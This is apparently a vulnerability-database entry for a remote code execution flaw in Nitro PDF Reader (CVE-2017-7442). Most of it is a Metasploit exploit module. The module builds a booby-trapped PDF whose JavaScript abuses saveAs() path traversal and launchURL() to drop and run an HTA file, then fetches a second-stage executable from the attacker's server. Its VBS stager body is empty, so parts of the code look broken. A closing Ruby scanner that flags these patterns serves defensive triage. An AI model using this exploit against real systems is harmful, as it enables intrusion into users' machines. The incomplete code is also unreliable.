SRC-2017-0005 : Nitro PDF Pro Doc.saveAs and App.launchURL Remote Code Execution Vulnerabilities

Published: 05 Apr 2017
Reported by: Steven Seeley of Source Incite
Type: srcincite
Source: srcincite.io

Attackers can execute arbitrary code on vulnerable installations of Nitro PDF Reader and Nitro PDF Reader Pro. Exploitation requires user interaction: the target must visit a malicious page or open a malicious file.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
        'Description' => %q{
          This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
          PDF Reader version 11. The saveAs() Javascript API function allows for writing
          arbitrary files to the file system. Additionally, the launchURL() function allows
          an attacker to execute local files on the file system and bypass the security dialog

          Note: This is 100% reliable.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'mr_me', # vulnerability discovery and exploit
          'bcoles',                                 # hidden hta tricks!
          'sinn3r'                                  # help with msf foo!
        ],
        'References' => [
          [ 'CVE', '2017-7442' ],
          [ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ],           # public advisory #1
          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ],    # public advisory #2 (verified and acquired by SSD)
        ],
        'DefaultOptions' => {
          'DisablePayloadHandler' => false
        },
        'Platform' => 'win',
        'Targets' => [
          # truly universal
          [ 'Automatic', {} ],
        ],
        'DisclosureDate' => '2017-07-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
      OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
    ])
    deregister_options('SSL', 'SSLVersion', 'SSLCert')
  end

  def build_vbs(url, stager_name)
    name_xmlhttp = rand_text_alpha(2)
    name_adodb = rand_text_alpha(2)
    vbs = %Q||
    vbs.gsub!(/    /, '')
    return vbs
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.exe/
      print_status("Sending second stage payload")
      return if ((p = regenerate_payload(cli)) == nil)

      data = generate_payload_exe({ :code => p.encoded })
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end
  end

  def exploit
    # To save binary data to the file system, the payload is written to a .vbs
    # file and executed from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder = "/Windows/Temp"
    register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")

    payload_src = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{datastore['URIPATH']}#{@payload_name}.exe"
    stager_name = rand_text_alpha(6) + ".vbs"
    pdf = %Q|%PDF-1.7
    4 0 obj
    <<
    /Length 0
    >>
    stream
    |
    pdf << build_vbs(payload_src, stager_name)
    pdf << %Q|
    endstream endobj
    5 0 obj
    <<
    /Type /Page
    /Parent 2 0 R
    /Contents 4 0 R
    >>
    endobj
    1 0 obj
    <<
    /Type /Catalog
    /Pages 2 0 R
    /OpenAction [ 5 0 R /Fit ]
      /Names <<
        /JavaScript <<
          /Names [ (EmbeddedJS)
            <<
              /S /JavaScript
              /JS (
                    this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
                    app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
              )
            >>
          ]
        >>
      >>
    >>
    endobj
    2 0 obj
    <>
    endobj
    3 0 obj
    <<>>
    endobj
    xref
    0 6
    0000000000 65535 f
    0000000166 00000 n
    0000000244 00000 n
    0000000305 00000 n
    0000000009 00000 n
    0000000058 00000 n
    trailer <<
    /Size 6
    /Root 1 0 R
    >>
    startxref
    327
    %%EOF|
    pdf.gsub!(/    /, '')
    file_create(pdf)
    super
  end
end
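
For triage of suspect documents, here is an added example (not part of the module or the advisory): a Ruby scanner that flags PDFs whose embedded JavaScript calls saveAs() with a path-traversal target or launchURL() on a non-web target, the two API uses the module above depends on. The function names and both sample documents are constructed for illustration, and the scanner only sees JavaScript stored as uncompressed strings, so compressed streams must be inflated before scanning.

```ruby
# Added triage example (not from the original module).
# Flags saveAs() with a traversal path and launchURL() on a non-http(s) target.
TRAVERSAL = %r{\.\.[/\\]}
WEB_URL   = %r{\Ahttps?://}i

# Return the first string-literal argument of every call to +func+.
def call_args(js, func)
  js.scan(/\b#{Regexp.escape(func)}\s*\(\s*(['"])(.*?)\1/m).map { |_q, arg| arg }
end

# Scan one PDF (binary string) and return an array of finding hashes.
def scan_pdf_js(pdf_bytes)
  text = pdf_bytes.dup.force_encoding(Encoding::BINARY)
  findings = []
  # Skip documents that declare no JavaScript action at all.
  return findings unless text =~ %r{/S\s*/JavaScript|/JS\b}

  call_args(text, 'saveAs').each do |path|
    next unless path =~ TRAVERSAL
    findings << { api: 'saveAs', reason: 'path traversal in save target', arg: path }
  end

  call_args(text, 'launchURL').each do |target|
    # An ordinary web link without traversal is expected behaviour.
    next if target =~ WEB_URL && target !~ TRAVERSAL
    findings << { api: 'launchURL', reason: 'non-web or traversal target', arg: target }
  end
  findings
end

# Constructed sample inputs (paths are placeholders, not real indicators).
SUSPICIOUS = <<~'PDF'
  %PDF-1.7
  1 0 obj
  << /Type /Catalog /Names << /JavaScript << /Names [ (EmbeddedJS)
    << /S /JavaScript /JS (
      this.saveAs('../../../tmp/example.hta');
      app.launchURL('c$:/../../tmp/example.hta');
    ) >> ] >> >> >>
  endobj
PDF

BENIGN = <<~'PDF'
  %PDF-1.7
  1 0 obj
  << /S /JavaScript /JS ( this.saveAs('report.pdf'); app.launchURL('https://example.com/help'); ) >>
  endobj
PDF

if __FILE__ == $PROGRAM_NAME
  ARGV.each { |f| scan_pdf_js(File.binread(f)).each { |h| puts "#{f}: #{h}" } }
end
```

Run it with one or more PDF paths as arguments; each finding names the API call, the reason, and the offending argument.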

23 Jul 2017 00:00 (current)
Vulners AI Score: 7.4 (High risk)
CVSS 2: 6.8
CVSS 3: 8.8
EPSS: 0.70304